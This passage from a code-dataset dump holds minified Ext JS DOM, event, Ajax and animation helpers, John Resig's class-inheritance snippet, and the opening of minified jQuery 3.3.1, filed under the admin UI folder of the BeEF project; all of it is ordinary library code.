g=document,e=g.compatMode=="CSS1Compat",f=Math.max,d=Math.round,h=parseInt;Ext.lib.Dom={isAncestor:function(j,k){var i=false;j=Ext.getDom(j);k=Ext.getDom(k);if(j&&k){if(j.contains){return j.contains(k)}else{if(j.compareDocumentPosition){return !!(j.compareDocumentPosition(k)&16)}else{while(k=k.parentNode){i=k==j||i}}}}return i},getViewWidth:function(i){return i?this.getDocumentWidth():this.getViewportWidth()},getViewHeight:function(i){return i?this.getDocumentHeight():this.getViewportHeight()},getDocumentHeight:function(){return f(!e?g.body.scrollHeight:g.documentElement.scrollHeight,this.getViewportHeight())},getDocumentWidth:function(){return f(!e?g.body.scrollWidth:g.documentElement.scrollWidth,this.getViewportWidth())},getViewportHeight:function(){return Ext.isIE?(Ext.isStrict?g.documentElement.clientHeight:g.body.clientHeight):self.innerHeight},getViewportWidth:function(){return !Ext.isStrict&&!Ext.isOpera?g.body.clientWidth:Ext.isIE?g.documentElement.clientWidth:self.innerWidth},getY:function(i){return this.getXY(i)[1]},getX:function(i){return this.getXY(i)[0]},getXY:function(k){var j,q,s,v,l,m,u=0,r=0,t,i,n=(g.body||g.documentElement),o=[0,0];k=Ext.getDom(k);if(k!=n){if(k.getBoundingClientRect){s=k.getBoundingClientRect();t=c(document).getScroll();o=[d(s.left+t.left),d(s.top+t.top)]}else{j=k;i=c(k).isStyle("position","absolute");while(j){q=c(j);u+=j.offsetLeft;r+=j.offsetTop;i=i||q.isStyle("position","absolute");if(Ext.isGecko){r+=v=h(q.getStyle("borderTopWidth"),10)||0;u+=l=h(q.getStyle("borderLeftWidth"),10)||0;if(j!=k&&!q.isStyle("overflow","visible")){u+=l;r+=v}}j=j.offsetParent}if(Ext.isSafari&&i){u-=n.offsetLeft;r-=n.offsetTop}if(Ext.isGecko&&!i){m=c(n);u+=h(m.getStyle("borderLeftWidth"),10)||0;r+=h(m.getStyle("borderTopWidth"),10)||0}j=k.parentNode;while(j&&j!=n){if(!Ext.isOpera||(j.tagName!="TR"&&!c(j).isStyle("display","inline"))){u-=j.scrollLeft;r-=j.scrollTop}j=j.parentNode}o=[u,r]}}return o},setXY:function(j,k){(j=Ext.fly(j,"_setXY")).position();var l=j.translatePoints(k),i=j.dom.style,m;for(m in l){if(!isNaN(l[m])){i[m]=l[m]+"px"}}},setX:function(j,i){this.setXY(j,[i,false])},setY:function(i,j){this.setXY(i,[false,j])}}})();Ext.lib.Event=function(){var v=false,f={},z=0,o=[],d,A=false,k=window,E=document,l=200,r=20,p=0,i=1,s=2,w=3,t="scrollLeft",q="scrollTop",g="unload",y="mouseover",D="mouseout",e=function(){var F;if(k.addEventListener){F=function(J,H,I,G){if(H=="mouseenter"){I=I.createInterceptor(n);J.addEventListener(y,I,(G))}else{if(H=="mouseleave"){I=I.createInterceptor(n);J.addEventListener(D,I,(G))}else{J.addEventListener(H,I,(G))}}return I}}else{if(k.attachEvent){F=function(J,H,I,G){J.attachEvent("on"+H,I);return I}}else{F=function(){}}}return F}(),h=function(){var F;if(k.removeEventListener){F=function(J,H,I,G){if(H=="mouseenter"){H=y}else{if(H=="mouseleave"){H=D}}J.removeEventListener(H,I,(G))}}else{if(k.detachEvent){F=function(I,G,H){I.detachEvent("on"+G,H)}}else{F=function(){}}}return F}();function n(F){return !u(F.currentTarget,x.getRelatedTarget(F))}function u(F,G){if(F&&F.firstChild){while(G){if(G===F){return true}G=G.parentNode;if(G&&(G.nodeType!=1)){G=null}}}return false}function B(){var G=false,L=[],J,I,F,H,K=!v||(z>0);if(!A){A=true;for(I=0;I<o.length;++I){F=o[I];if(F&&(J=E.getElementById(F.id))){if(!F.checkReady||v||J.nextSibling||(E&&E.body)){H=F.override;J=H?(H===true?F.obj:H):J;F.fn.call(J,F.obj);o.remove(F);--I}else{L.push(F)}}}z=(L.length===0)?0:z-1;if(K){m()}else{clearInterval(d);d=null}G=!(A=false)}return G}function m(){if(!d){var F=function(){B()};d=setInterval(F,r)}}function C(){var F=E.documentElement,G=E.body;if(F&&(F[q]||F[t])){return[F[t],F[q]]}else{if(G){return[G[t],G[q]]}else{return[0,0]}}}function j(F,G){F=F.browserEvent||F;var H=F["page"+G];if(!H&&H!==0){H=F["client"+G]||0;if(Ext.isIE){H+=C()[G=="X"?0:1]}}return H}var x={extAdapter:true,onAvailable:function(H,F,I,G){o.push({id:H,fn:F,obj:I,override:G,checkReady:false});z=l;m()},addListener:function(H,F,G){H=Ext.getDom(H);if(H&&G){if(F==g){if(f[H.id]===undefined){f[H.id]=[]}f[H.id].push([F,G]);return G}return e(H,F,G,false)}return false},removeListener:function(L,H,K){L=Ext.getDom(L);var J,G,F,I;if(L&&K){if(H==g){if((I=f[L.id])!==undefined){for(J=0,G=I.length;J<G;J++){if((F=I[J])&&F[p]==H&&F[i]==K){f[L.id].splice(J,1)}}}return}h(L,H,K,false)}},getTarget:function(F){F=F.browserEvent||F;return this.resolveTextNode(F.target||F.srcElement)},resolveTextNode:Ext.isGecko?function(G){if(!G){return}var F=HTMLElement.prototype.toString.call(G);if(F=="[xpconnect wrapped native prototype]"||F=="[object XULElement]"){return}return G.nodeType==3?G.parentNode:G}:function(F){return F&&F.nodeType==3?F.parentNode:F},getRelatedTarget:function(F){F=F.browserEvent||F;return this.resolveTextNode(F.relatedTarget||(/(mouseout|mouseleave)/.test(F.type)?F.toElement:/(mouseover|mouseenter)/.test(F.type)?F.fromElement:null))},getPageX:function(F){return j(F,"X")},getPageY:function(F){return j(F,"Y")},getXY:function(F){return[this.getPageX(F),this.getPageY(F)]},stopEvent:function(F){this.stopPropagation(F);this.preventDefault(F)},stopPropagation:function(F){F=F.browserEvent||F;if(F.stopPropagation){F.stopPropagation()}else{F.cancelBubble=true}},preventDefault:function(F){F=F.browserEvent||F;if(F.preventDefault){F.preventDefault()}else{if(F.keyCode){F.keyCode=0}F.returnValue=false}},getEvent:function(F){F=F||k.event;if(!F){var G=this.getEvent.caller;while(G){F=G.arguments[0];if(F&&Event==F.constructor){break}G=G.caller}}return F},getCharCode:function(F){F=F.browserEvent||F;return F.charCode||F.keyCode||0},getListeners:function(G,F){Ext.EventManager.getListeners(G,F)},purgeElement:function(G,H,F){Ext.EventManager.purgeElement(G,H,F)},_load:function(F){v=true;if(Ext.isIE&&F!==true){h(k,"load",arguments.callee)}},_unload:function(J){var G=Ext.lib.Event,H,M,K,F,I,N;for(F in f){K=f[F];for(H=0,I=K.length;H<I;H++){M=K[H];if(M){try{N=M[w]?(M[w]===true?M[s]:M[w]):k;M[i].call(N,G.getEvent(J),M[s])}catch(L){}}}}Ext.EventManager._unload();h(k,g,G._unload)}};x.on=x.addListener;x.un=x.removeListener;if(E&&E.body){x._load(true)}else{e(k,"load",x._load)}e(k,g,x._unload);B();return x}();Ext.lib.Ajax=function(){var g=["Msxml2.XMLHTTP.6.0","Msxml2.XMLHTTP.3.0","Msxml2.XMLHTTP"],d="Content-Type";function h(v){var t=v.conn,w,u={};function s(x,y){for(w in y){if(y.hasOwnProperty(w)){x.setRequestHeader(w,y[w])}}}Ext.apply(u,k.headers,k.defaultHeaders);s(t,u);delete k.headers}function e(v,u,t,s){return{tId:v,status:t?-1:0,statusText:t?"transaction aborted":"communication failure",isAbort:t,isTimeout:s,argument:u}}function j(s,t){(k.headers=k.headers||{})[s]=t}function p(u,y){var C={},x,w=u.conn,A,B,v=w.status==1223;try{x=u.conn.getAllResponseHeaders();Ext.each(x.replace(/\r\n/g,"\n").split("\n"),function(s){A=s.indexOf(":");if(A>=0){B=s.substr(0,A).toLowerCase();if(s.charAt(A+1)==" "){++A}C[B]=s.substr(A+1)}})}catch(z){}return{tId:u.tId,status:v?204:w.status,statusText:v?"No Content":w.statusText,getResponseHeader:function(s){return C[s.toLowerCase()]},getAllResponseHeaders:function(){return x},responseText:w.responseText,responseXML:w.responseXML,argument:y}}function o(s){if(s.tId){k.conn[s.tId]=null}s.conn=null;s=null}function f(x,y,t,s){if(!y){o(x);return}var v,u;try{if(x.conn.status!==undefined&&x.conn.status!=0){v=x.conn.status}else{v=13030}}catch(w){v=13030}if((v>=200&&v<300)||(Ext.isIE&&v==1223)){u=p(x,y.argument);if(y.success){if(!y.scope){y.success(u)}else{y.success.apply(y.scope,[u])}}}else{switch(v){case 12002:case 12029:case 12030:case 12031:case 12152:case 13030:u=e(x.tId,y.argument,(t?t:false),s);if(y.failure){if(!y.scope){y.failure(u)}else{y.failure.apply(y.scope,[u])}}break;default:u=p(x,y.argument);if(y.failure){if(!y.scope){y.failure(u)}else{y.failure.apply(y.scope,[u])}}}}o(x);u=null}function m(u,x,s,w,t,v){if(s&&s.readyState==4){clearInterval(t[w]);t[w]=null;if(v){clearTimeout(k.timeout[w]);k.timeout[w]=null}f(u,x)}}function r(s,t){k.abort(s,t,true)}function n(u,x){x=x||{};var s=u.conn,w=u.tId,t=k.poll,v=x.timeout||null;if(v){k.conn[w]=s;k.timeout[w]=setTimeout(r.createCallback(u,x),v)}t[w]=setInterval(m.createCallback(u,x,s,w,t,v),k.pollInterval)}function i(w,t,v,s){var u=l()||null;if(u){u.conn.open(w,t,true);if(k.useDefaultXhrHeader){j("X-Requested-With",k.defaultXhrHeader)}if(s&&k.useDefaultHeader&&(!k.headers||!k.headers[d])){j(d,k.defaultPostHeader)}if(k.defaultHeaders||k.headers){h(u)}n(u,v);u.conn.send(s||null)}return u}function l(){var t;try{if(t=q(k.transactionId)){k.transactionId++}}catch(s){}finally{return t}}function q(v){var s;try{s=new XMLHttpRequest()}catch(u){for(var t=Ext.isIE6?1:0;t<g.length;++t){try{s=new ActiveXObject(g[t]);break}catch(u){}}}finally{return{conn:s,tId:v}}}var k={request:function(s,u,v,w,A){if(A){var x=this,t=A.xmlData,y=A.jsonData,z;Ext.applyIf(x,A);if(t||y){z=x.headers;if(!z||!z[d]){j(d,t?"text/xml":"application/json")}w=t||(!Ext.isPrimitive(y)?Ext.encode(y):y)}}return i(s||A.method||"POST",u,v,w)},serializeForm:function(y){var x=y.elements||(document.forms[y]||Ext.getDom(y)).elements,s=false,w=encodeURIComponent,t,z="",v,u;Ext.each(x,function(A){t=A.name;v=A.type;if(!A.disabled&&t){if(/select-(one|multiple)/i.test(v)){Ext.each(A.options,function(B){if(B.selected){u=B.hasAttribute?B.hasAttribute("value"):B.getAttributeNode("value").specified;z+=String.format("{0}={1}&",w(t),w(u?B.value:B.text))}})}else{if(!(/file|undefined|reset|button/i.test(v))){if(!(/radio|checkbox/i.test(v)&&!A.checked)&&!(v=="submit"&&s)){z+=w(t)+"="+w(A.value)+"&";s=/submit/i.test(v)}}}}});return z.substr(0,z.length-1)},useDefaultHeader:true,defaultPostHeader:"application/x-www-form-urlencoded; charset=UTF-8",useDefaultXhrHeader:true,defaultXhrHeader:"XMLHttpRequest",poll:{},timeout:{},conn:{},pollInterval:50,transactionId:0,abort:function(v,x,s){var u=this,w=v.tId,t=false;if(u.isCallInProgress(v)){v.conn.abort();clearInterval(u.poll[w]);u.poll[w]=null;clearTimeout(k.timeout[w]);u.timeout[w]=null;f(v,x,(t=true),s)}return t},isCallInProgress:function(s){return s.conn&&!{0:true,4:true}[s.conn.readyState]}};return k}();(function(){var g=Ext.lib,i=/width|height|opacity|padding/i,f=/^((width|height)|(top|left))$/,d=/width|height|top$|bottom$|left$|right$/i,h=/\d+(em|%|en|ex|pt|in|cm|mm|pc)$/i,j=function(k){return typeof k!=="undefined"},e=function(){return new Date()};g.Anim={motion:function(n,l,o,p,k,m){return this.run(n,l,o,p,k,m,Ext.lib.Motion)},run:function(o,l,q,r,k,n,m){m=m||Ext.lib.AnimBase;if(typeof r=="string"){r=Ext.lib.Easing[r]}var p=new m(o,l,q,r);p.animateX(function(){if(Ext.isFunction(k)){k.call(n)}});return p}};g.AnimBase=function(l,k,m,n){if(l){this.init(l,k,m,n)}};g.AnimBase.prototype={doMethod:function(k,n,l){var m=this;return m.method(m.curFrame,n,l-n,m.totalFrames)},setAttr:function(k,m,l){if(i.test(k)&&m<0){m=0}Ext.fly(this.el,"_anim").setStyle(k,m+l)},getAttr:function(k){var m=Ext.fly(this.el),n=m.getStyle(k),l=f.exec(k)||[];if(n!=="auto"&&!h.test(n)){return parseFloat(n)}return(!!(l[2])||(m.getStyle("position")=="absolute"&&!!(l[3])))?m.dom["offset"+l[0].charAt(0).toUpperCase()+l[0].substr(1)]:0},getDefaultUnit:function(k){return d.test(k)?"px":""},animateX:function(n,k){var l=this,m=function(){l.onComplete.removeListener(m);if(Ext.isFunction(n)){n.call(k||l,l)}};l.onComplete.addListener(m,l);l.animate()},setRunAttr:function(p){var r=this,s=this.attributes[p],t=s.to,q=s.by,u=s.from,v=s.unit,l=(this.runAttrs[p]={}),m;if(!j(t)&&!j(q)){return false}var k=j(u)?u:r.getAttr(p);if(j(t)){m=t}else{if(j(q)){if(Ext.isArray(k)){m=[];for(var n=0,o=k.length;n<o;n++){m[n]=k[n]+q[n]}}else{m=k+q}}}Ext.apply(l,{start:k,end:m,unit:j(v)?v:r.getDefaultUnit(p)})},init:function(l,p,o,k){var r=this,n=0,s=g.AnimMgr;Ext.apply(r,{isAnimated:false,startTime:null,el:Ext.getDom(l),attributes:p||{},duration:o||1,method:k||g.Easing.easeNone,useSec:true,curFrame:0,totalFrames:s.fps,runAttrs:{},animate:function(){var u=this,v=u.duration;if(u.isAnimated){return false}u.curFrame=0;u.totalFrames=u.useSec?Math.ceil(s.fps*v):v;s.registerElement(u)},stop:function(u){var v=this;if(u){v.curFrame=v.totalFrames;v._onTween.fire()}s.stop(v)}});var t=function(){var v=this,u;v.onStart.fire();v.runAttrs={};for(u in this.attributes){this.setRunAttr(u)}v.isAnimated=true;v.startTime=e();n=0};var q=function(){var v=this;v.onTween.fire({duration:e()-v.startTime,curFrame:v.curFrame});var w=v.runAttrs;for(var u in w){this.setAttr(u,v.doMethod(u,w[u].start,w[u].end),w[u].unit)}++n};var m=function(){var u=this,w=(e()-u.startTime)/1000,v={duration:w,frames:n,fps:n/w};u.isAnimated=false;n=0;u.onComplete.fire(v)};r.onStart=new Ext.util.Event(r);r.onTween=new Ext.util.Event(r);r.onComplete=new Ext.util.Event(r);(r._onStart=new Ext.util.Event(r)).addListener(t);(r._onTween=new Ext.util.Event(r)).addListener(q);(r._onComplete=new Ext.util.Event(r)).addListener(m)}};Ext.lib.AnimMgr=new function(){var o=this,m=null,l=[],k=0;Ext.apply(o,{fps:1000,delay:1,registerElement:function(q){l.push(q);++k;q._onStart.fire();o.start()},unRegister:function(r,q){r._onComplete.fire();q=q||p(r);if(q!=-1){l.splice(q,1)}if(--k<=0){o.stop()}},start:function(){if(m===null){m=setInterval(o.run,o.delay)}},stop:function(s){if(!s){clearInterval(m);for(var r=0,q=l.length;r<q;++r){if(l[0].isAnimated){o.unRegister(l[0],0)}}l=[];m=null;k=0}else{o.unRegister(s)}},run:function(){var t,s,q,r;for(s=0,q=l.length;s<q;s++){r=l[s];if(r&&r.isAnimated){t=r.totalFrames;if(r.curFrame<t||t===null){++r.curFrame;if(r.useSec){n(r)}r._onTween.fire()}else{o.stop(r)}}}}});var p=function(s){var r,q;for(r=0,q=l.length;r<q;r++){if(l[r]===s){return r}}return -1};var n=function(r){var v=r.totalFrames,u=r.curFrame,t=r.duration,s=(u*t*1000/v),q=(e()-r.startTime),w=0;if(q<t*1000){w=Math.round((q/s-1)*u)}else{w=v-(u+1)}if(w>0&&isFinite(w)){if(r.curFrame+w>=v){w=v-(u+1)}r.curFrame+=w}}};g.Bezier=new function(){this.getPosition=function(p,o){var r=p.length,m=[],q=1-o,l,k;for(l=0;l<r;++l){m[l]=[p[l][0],p[l][1]]}for(k=1;k<r;++k){for(l=0;l<r-k;++l){m[l][0]=q*m[l][0]+o*m[parseInt(l+1,10)][0];m[l][1]=q*m[l][1]+o*m[parseInt(l+1,10)][1]}}return[m[0][0],m[0][1]]}};g.Easing={easeNone:function(l,k,n,m){return n*l/m+k},easeIn:function(l,k,n,m){return n*(l/=m)*l+k},easeOut:function(l,k,n,m){return -n*(l/=m)*(l-2)+k}};(function(){g.Motion=function(o,n,p,q){if(o){g.Motion.superclass.constructor.call(this,o,n,p,q)}};Ext.extend(g.Motion,Ext.lib.AnimBase);var m=g.Motion.superclass,l=/^points$/i;Ext.apply(g.Motion.prototype,{setAttr:function(n,r,q){var p=this,o=m.setAttr;if(l.test(n)){q=q||"px";o.call(p,"left",r[0],q);o.call(p,"top",r[1],q)}else{o.call(p,n,r,q)}},getAttr:function(n){var p=this,o=m.getAttr;return l.test(n)?[o.call(p,"left"),o.call(p,"top")]:o.call(p,n)},doMethod:function(n,q,o){var p=this;return l.test(n)?g.Bezier.getPosition(p.runAttrs[n],p.method(p.curFrame,0,100,p.totalFrames)/100):m.doMethod.call(p,n,q,o)},setRunAttr:function(u){if(l.test(u)){var w=this,p=this.el,z=this.attributes.points,s=z.control||[],x=z.from,y=z.to,v=z.by,A=g.Dom,o,r,q,t,n;if(s.length>0&&!Ext.isArray(s[0])){s=[s]}else{}Ext.fly(p,"_anim").position();A.setXY(p,j(x)?x:A.getXY(p));o=w.getAttr("points");if(j(y)){q=k.call(w,y,o);for(r=0,t=s.length;r<t;++r){s[r]=k.call(w,s[r],o)}}else{if(j(v)){q=[o[0]+v[0],o[1]+v[1]];for(r=0,t=s.length;r<t;++r){s[r]=[o[0]+s[r][0],o[1]+s[r][1]]}}}n=this.runAttrs[u]=[o];if(s.length>0){n=n.concat(s)}n[n.length]=q}else{m.setRunAttr.call(this,u)}}});var k=function(n,p){var o=g.Dom.getXY(this.el);return[n[0]-o[0]+p[0],n[1]-o[1]+p[1]]}})()})();(function(){var d=Math.abs,i=Math.PI,h=Math.asin,g=Math.pow,e=Math.sin,f=Ext.lib;Ext.apply(f.Easing,{easeBoth:function(k,j,m,l){return((k/=l/2)<1)?m/2*k*k+j:-m/2*((--k)*(k-2)-1)+j},easeInStrong:function(k,j,m,l){return m*(k/=l)*k*k*k+j},easeOutStrong:function(k,j,m,l){return -m*((k=k/l-1)*k*k*k-1)+j},easeBothStrong:function(k,j,m,l){return((k/=l/2)<1)?m/2*k*k*k*k+j:-m/2*((k-=2)*k*k*k-2)+j},elasticIn:function(l,j,q,o,k,n){if(l==0||(l/=o)==1){return l==0?j:j+q}n=n||(o*0.3);var m;if(k>=d(q)){m=n/(2*i)*h(q/k)}else{k=q;m=n/4}return -(k*g(2,10*(l-=1))*e((l*o-m)*(2*i)/n))+j},elasticOut:function(l,j,q,o,k,n){if(l==0||(l/=o)==1){return l==0?j:j+q}n=n||(o*0.3);var m;if(k>=d(q)){m=n/(2*i)*h(q/k)}else{k=q;m=n/4}return k*g(2,-10*l)*e((l*o-m)*(2*i)/n)+q+j},elasticBoth:function(l,j,q,o,k,n){if(l==0||(l/=o/2)==2){return l==0?j:j+q}n=n||(o*(0.3*1.5));var m;if(k>=d(q)){m=n/(2*i)*h(q/k)}else{k=q;m=n/4}return l<1?-0.5*(k*g(2,10*(l-=1))*e((l*o-m)*(2*i)/n))+j:k*g(2,-10*(l-=1))*e((l*o-m)*(2*i)/n)*0.5+q+j},backIn:function(k,j,n,m,l){l=l||1.70158;return n*(k/=m)*k*((l+1)*k-l)+j},backOut:function(k,j,n,m,l){if(!l){l=1.70158}return n*((k=k/m-1)*k*((l+1)*k+l)+1)+j},backBoth:function(k,j,n,m,l){l=l||1.70158;return((k/=m/2)<1)?n/2*(k*k*(((l*=(1.525))+1)*k-l))+j:n/2*((k-=2)*k*(((l*=(1.525))+1)*k+l)+2)+j},bounceIn:function(k,j,m,l){return m-f.Easing.bounceOut(l-k,0,m,l)+j},bounceOut:function(k,j,m,l){if((k/=l)<(1/2.75)){return m*(7.5625*k*k)+j}else{if(k<(2/2.75)){return m*(7.5625*(k-=(1.5/2.75))*k+0.75)+j}else{if(k<(2.5/2.75)){return m*(7.5625*(k-=(2.25/2.75))*k+0.9375)+j}}}return m*(7.5625*(k-=(2.625/2.75))*k+0.984375)+j},bounceBoth:function(k,j,m,l){return(k<l/2)?f.Easing.bounceIn(k*2,0,m,l)*0.5+j:f.Easing.bounceOut(k*2-l,0,m,l)*0.5+m*0.5+j}})})();(function(){var h=Ext.lib;h.Anim.color=function(p,n,q,r,m,o){return h.Anim.run(p,n,q,r,m,o,h.ColorAnim)};h.ColorAnim=function(n,m,o,p){h.ColorAnim.superclass.constructor.call(this,n,m,o,p)};Ext.extend(h.ColorAnim,h.AnimBase);var j=h.ColorAnim.superclass,i=/color$/i,f=/^transparent|rgba\(0, 0, 0, 0\)$/,l=/^rgb\(([0-9]+)\s*,\s*([0-9]+)\s*,\s*([0-9]+)\)$/i,d=/^#?([0-9A-F]{2})([0-9A-F]{2})([0-9A-F]{2})$/i,e=/^#?([0-9A-F]{1})([0-9A-F]{1})([0-9A-F]{1})$/i,g=function(m){return typeof m!=="undefined"};function k(n){var p=parseInt,o,m=null,q;if(n.length==3){return n}Ext.each([d,l,e],function(s,r){o=(r%2==0)?16:10;q=s.exec(n);if(q&&q.length==4){m=[p(q[1],o),p(q[2],o),p(q[3],o)];return false}});return m}Ext.apply(h.ColorAnim.prototype,{getAttr:function(m){var o=this,n=o.el,p;if(i.test(m)){while(n&&f.test(p=Ext.fly(n).getStyle(m))){n=n.parentNode;p="fff"}}else{p=j.getAttr.call(o,m)}return p},doMethod:function(s,m,o){var t=this,n,q=Math.floor,p,r,u;if(i.test(s)){n=[];o=o||[];for(p=0,r=m.length;p<r;p++){u=m[p];n[p]=j.doMethod.call(t,s,u,o[p])}n="rgb("+q(n[0])+","+q(n[1])+","+q(n[2])+")"}else{n=j.doMethod.call(t,s,m,o)}return n},setRunAttr:function(r){var t=this,u=t.attributes[r],v=u.to,s=u.by,n;j.setRunAttr.call(t,r);n=t.runAttrs[r];if(i.test(r)){var m=k(n.start),o=k(n.end);if(!g(v)&&g(s)){o=k(s);for(var p=0,q=m.length;p<q;p++){o[p]=m[p]+o[p]}}n.start=m;n.end=o}}})})();(function(){var d=Ext.lib;d.Anim.scroll=function(j,h,k,l,g,i){return d.Anim.run(j,h,k,l,g,i,d.Scroll)};d.Scroll=function(h,g,i,j){if(h){d.Scroll.superclass.constructor.call(this,h,g,i,j)}};Ext.extend(d.Scroll,d.ColorAnim);var f=d.Scroll.superclass,e="scroll";Ext.apply(d.Scroll.prototype,{doMethod:function(g,m,h){var k,j=this,l=j.curFrame,i=j.totalFrames;if(g==e){k=[j.method(l,m[0],h[0]-m[0],i),j.method(l,m[1],h[1]-m[1],i)]}else{k=f.doMethod.call(j,g,m,h)}return k},getAttr:function(g){var h=this;if(g==e){return[h.el.scrollLeft,h.el.scrollTop]}else{return f.getAttr.call(h,g)}},setAttr:function(g,j,i){var h=this;if(g==e){h.el.scrollLeft=j[0];h.el.scrollTop=j[1]}else{f.setAttr.call(h,g,j,i)}}})})();if(Ext.isIE){function a(){var d=Function.prototype;delete d.createSequence;delete d.defer;delete d.createDelegate;delete d.createCallback;delete d.createInterceptor;window.detachEvent("onunload",a)}window.attachEvent("onunload",a)}})(); |
JavaScript | beef/extensions/admin_ui/media/javascript/esapi/Class.create.js | /*
* Copyright (c) 2006-2023 Wade Alcorn - [email protected]
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
/* Simple JavaScript Inheritance
* By John Resig http://ejohn.org/
* MIT Licensed.
*/
// Inspired by base2 and Prototype
(function(){
var initializing = false, fnTest = /xyz/.test(function(){xyz;}) ? /\b_super\b/ : /.*/;
// The base Class implementation (does nothing)
this.Class = function(){};
// Create a new Class that inherits from this class
Class.extend = function(prop) {
var _super = this.prototype;
// Instantiate a base class (but only create the instance,
// don't run the init constructor)
initializing = true;
var prototype = new this();
initializing = false;
// Copy the properties over onto the new prototype
for (var name in prop) {
// Check if we're overwriting an existing function
prototype[name] = typeof prop[name] == "function" &&
typeof _super[name] == "function" && fnTest.test(prop[name]) ?
(function(name, fn){
return function() {
var tmp = this._super;
// Add a new ._super() method that is the same method
// but on the super-class
this._super = _super[name];
// The method only need to be bound temporarily, so we
// remove it when we're done executing
var ret = fn.apply(this, arguments);
this._super = tmp;
return ret;
};
})(name, prop[name]) :
prop[name];
}
// The dummy class constructor
function Class() {
// All construction is actually done in the init method
if ( !initializing && this.init )
this.init.apply(this, arguments);
}
// Populate our constructed prototype object
Class.prototype = prototype;
// Enforce the constructor to be what we expect
Class.constructor = Class;
// And make this class extendable
Class.extend = arguments.callee;
return Class;
};
})(); |
JavaScript | beef/extensions/admin_ui/media/javascript/esapi/jquery-3.3.1.min.js | /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==typeof(n=f.call(t,"constructor")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(T,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",R="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",I="\\["+M+"*("+R+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+R+"))|)"+M+"*\\]",W=":("+R+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+I+")*)|.*)\\)|)",$=new RegExp(M+"+","g"),B=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),F=new RegExp("^"+M+"*,"+M+"*"),_=new 